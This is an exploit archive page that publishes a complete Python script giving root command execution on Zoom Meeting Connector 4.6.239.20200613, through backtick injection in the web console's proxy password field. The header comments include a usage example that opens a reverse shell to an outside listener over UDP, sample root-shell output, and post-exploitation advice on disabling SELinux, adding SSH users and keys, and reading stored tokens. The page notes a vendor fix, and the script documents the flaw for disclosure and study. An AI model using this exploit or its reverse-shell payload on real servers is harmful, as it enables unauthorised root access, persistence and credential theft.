what you don't know can hurt you

Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root

Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root
Posted Dec 31, 2020
Authored by Jeremy Brown

Zoom version 4.6.239.20200613 suffers from a Meeting Connector post-authentication remote root code execution vulnerability via the proxy server functionality. The latest Zoom client has this issue patched per Zoom.

tags | exploit, remote, root, code execution
MD5 | 502538df7bfbda265c17c493f89179b7

Zoom 4.6.239.20200613 Meeting Connector Post-Auth Remote Root

Change Mirror Download
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#
# zoomer.py
#
# Zoom Meeting Connector Post-auth Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# The Meeting Connector Web Console listens on port 5480. On the dashboard
# under Network -> Proxy, one can enable a proxy server. All of the fields
# are sanitized to a certain degree, even the developers noting in the proxy()
# function within backend\webconsole\WebConsole\net.py that they explicitly
# were concerned with command injection and attempted to prevent it:
#
# if ('"' in proxy_name) or ('"' in proxy_passwd): # " double quotes cannot be used to prevent shell injection
# is_valid = False
#
# It makes sense to leave some flexibility in the character limits here
# passwords are often expected to contain more than alphanumeric characters.
# But of course that means the Proxy Password field is still vulnerable to
# command injection with the ` character.
#
# The proxy data gets concatenated and written to /etc/profile.d/proxy.sh.
# Every three minutes, a task runs which executes this proxy script as root.
# After submission the dashboard says “The proxy will take effect after the
# server reboot!”, but the commands will still be executed within actually
# requiring a reboot. Keep in mind that the commands will be executed blind.
#
# For example, `id>/tmp/proxy_test` given as the Proxy Password will produce
# this in the /tmp/proxy_test file:
#
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
#
# MMR was tested, but Controller and VRC may also be vulnerable
#
# Usage
# > zoomer.py 10.0.0.10 admin xsecRET1 "sh -i >& /dev/udp/10.0.0.11/5555 0>&1"
# login succeeded
# command sent to server
#
# $ nc -u -lvp 5555
# ....
# sh: no job control in this shell
# sh-4.2# pwd
# /root
# sh-4.2#
#
# setenforce 0 if SELinux bothers you, service sshd start and add users/keys,
# check tokens in /opt/zoom/conf/register, check out the local environment, etc.
#
# Dependencies
# - pip install pyquery
#
# Fix
# Zoom says they've fixed this in the latest version
#

import os
import sys
import argparse
import requests
import urllib.parse
from pyquery import PyQuery
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class Zoomer(object):
def __init__(self, args):
self.target = args.target
self.port = args.port
self.username = args.username
self.password = args.password
self.command = args.command

def run(self):
target = "https://" + self.target + ':' + str(self.port)

session = requests.Session()
session.verify = False

#
# get csrftoken from /login and use it to auth with creds
#
try:
resp = session.get(target + "/login")
except Exception as error:
print("Error: %s" % error)
return -1

try:
csrftoken = resp.headers['set-cookie'].split(';')[0]
except:
print("Error: couldn't parse csrftoken from response header")
return -1

csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')

if(csrfmiddlewaretoken == None):
return -1

data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'name':self.username,
'password':self.password}

headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie':csrftoken}

try:
resp = session.post(target + "/login", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1

if(resp.status_code != 200 or 'Wrong' in resp.text):
print("login failed")
return -1
else:
print("login succeeded")

#
# get csrfmiddlewaretoken from /network/proxy and post cmd
#
try:
resp = session.get(target + "/network/proxy")
except Exception as error:
print("Error: %s" % error)
return -1

csrfmiddlewaretoken = self.get_token(resp.text, 'csrfmiddlewaretoken')

cookies = session.cookies.get_dict()

#
# this happens with view-only users
#
if(len(cookies) < 2):
print("Error: failed to get session ID")
return -1

command = '`' + self.command + '`'

headers = \
{'Host':self.target + ':' + str(self.port),
'Referer':target,
'Cookie': \
'csrftoken=' + cookies['csrftoken'] + ';' + \
'sessionid=' + cookies['sessionid']}

data = \
{'csrfmiddlewaretoken':csrfmiddlewaretoken,
'proxyValue':1,
'proxyAddr':'localhost',
'proxyPort':8080,
'proxyName':'test',
'proxyPasswd':command}

try:
resp = session.post(target + "/network/proxy", headers=headers, data=data)
except Exception as error:
print("Error: %s" % error)
return -1

if(resp.status_code != 200):
print("something failed")
return -1
else:
print("command sent to server")

return 0

def get_token(self, body, name):
token = None

pq = PyQuery(body)

if(name == 'csrftoken'):
print("csrftoken")

if(name == 'csrfmiddlewaretoken'):
token = pq('input').attr('value')

return token

def arg_parse():
parser = argparse.ArgumentParser()

parser.add_argument("target",
type=str,
help="Zoom server")

parser.add_argument("-p",
"--port",
type=int,
default=5480,
help="Zoom port")

parser.add_argument("username",
type=str,
help="Valid username")

parser.add_argument("password",
type=str,
help="Valid password")

parser.add_argument("command",
type=str,
help="Command to execute (replace space with $IFS ?)")

args = parser.parse_args()

return args

def main():
args = arg_parse()

zm = Zoomer(args)

result = zm.run()

if(result > 0):
sys.exit(-1)

if(__name__ == '__main__'):
main()
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close